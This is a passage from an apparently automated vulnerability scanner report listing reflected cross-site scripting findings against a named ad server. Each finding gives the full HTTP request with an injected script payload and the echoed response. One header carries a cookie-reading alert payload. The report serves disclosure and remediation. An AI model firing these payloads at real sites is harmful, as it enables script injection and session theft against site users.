Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:37 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 511
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fa92cb881e00000000a4d50"><script>alert(1)</script>0efa3e551a1/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREAT
...[SNIP]...

2.705. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86e0a"><script>alert(1)</script>28f9b0d0f51 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random86e0a"><script>alert(1)</script>28f9b0d0f51=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:38 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 511
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fa92cb881e00000000/acc_random86e0a"><script>alert(1)</script>28f9b0d0f51=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid
...[SNIP]...

2.706. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcbab"><script>alert(1)</script>4a82df0e73e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?bcbab"><script>alert(1)</script>4a82df0e73e=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:36 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 514
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fa92cb881e00000000/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?bcbab"><script>alert(1)</script>4a82df0e73e=1" target="_new">
...[SNIP]...

2.707. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc735"><script>alert(1)</script>28006cbe02a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hservercc735"><script>alert(1)</script>28006cbe02a/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:36 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 511
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fb92cb881e00000000cc735"><script>alert(1)</script>28006cbe02a/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREAT
...[SNIP]...

2.708. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc78"><script>alert(1)</script>bfdd67836dd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randomdfc78"><script>alert(1)</script>bfdd67836dd=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:37 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 511
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fb92cb881e00000000/acc_randomdfc78"><script>alert(1)</script>bfdd67836dd=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid
...[SNIP]...

2.709. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9250f"><script>alert(1)</script>3fc0eaf9429 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?9250f"><script>alert(1)</script>3fc0eaf9429=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:35 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 514
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fb92cb881e00000000/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?9250f"><script>alert(1)</script>3fc0eaf9429=1" target="_new">
...[SNIP]...

2.710. http://media.sensis.com.au/jserver/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /jserver/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ead0a'-alert(1)-'daa7534d726 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jserveread0a'-alert(1)-'daa7534d726/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://medrx.sensis.com.au/images/sensis/cookieFix.html?acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:11:58 GMT
X-DirectServer: DS5
Content-Type: application/x-javascript
Content-Length: 1649
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

document.writeln("<iframe src=\"http://view.atdmt.com/2D1/iview/snssmdva00100002822d1/direct;wi.300;hi.250/01?rand=676490127433&click=http://media.sensis.com.au/ADCLICK/CID=0000c3161f45920200000000ead
...[SNIP]...
<a href="http://media.sensis.com.au/ADCLICK/CID=0000c3161f45920200000000ead0a'-alert(1)-'daa7534d726/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415/relocate=http://clk.redcated/2D1/go/snssmdva001000028
...[SNIP]...

2.711. http://media.sensis.com.au/jserver/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /jserver/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec18a'-alert(1)-'929f14a4b1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jserver/acc_randomec18a'-alert(1)-'929f14a4b1a=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://medrx.sensis.com.au/images/sensis/cookieFix.html?acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:05 GMT
X-DirectServer: DS3
Content-Type: application/x-javascript
Content-Length: 1539
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<!--Begin JSERVER Skip-->

document.write('<scr'+'ipt src="http://ad.au.vulnerable.ad.partner/adj/N5413.sensis/B5012654.7;sz=300x250;click=http://media.sensis.com.au/ADCLICK/CID=000343c41f45920200000000/acc_randomec18a'-alert(1)-'929f14a4b1a=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415/relocate=;ord=?">
...[SNIP]...

2.712. http://media.sensis.com.au/jserver/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /jserver/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbfd3'-alert(1)-'e30cf483b0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jserver/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415?fbfd3'-alert(1)-'e30cf483b0c=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://medrx.sensis.com.au/images/sensis/cookieFix.html?acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:11:51 GMT
X-DirectServer: DS3
Content-Type: application/x-javascript
Content-Length: 1658
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

document.writeln("<iframe src=\"http://view.atdmt.com/2D1/iview/snssmdva00100002822d1/direct;wi.300;hi.250/01?rand=676490127433&click=http://media.sensis.com.au/ADCLICK/CID=0000c3161f45920200000000/ac
...[SNIP]...
dia.sensis.com.au/ADCLICK/CID=0000c3161f45920200000000/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415?fbfd3'-alert(1)-'e30cf483b0c=1&relocate=http://clk.redcated/2D1/go/snssmdva00100002822d1/direct;wi.300;hi.250/01/676490127433/" target="_blank">
...[SNIP]...

2.713. http://media.sensis.com.au/jserver/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /jserver/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 116e7'-alert(1)-'c801336c73d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jserver116e7'-alert(1)-'c801336c73d/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://medrx.sensis.com.au/images/sensis/cookieFix.html?acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:11:54 GMT
X-DirectServer: DS5
Content-Type: application/x-javascript
Content-Length: 1649
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

document.writeln("<iframe src=\"http://view.atdmt.com/2D1/iview/snssmdva00100002822d1/direct;wi.300;hi.250/01?rand=951172862928&click=http://media.sensis.com.au/ADCLICK/CID=0000c3161f45920200000000116
...[SNIP]...
<a href="http://media.sensis.com.au/ADCLICK/CID=0000c3161f45920200000000116e7'-alert(1)-'c801336c73d/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415/relocate=http://clk.redcated/2D1/go/snssmdva001000028
...[SNIP]...

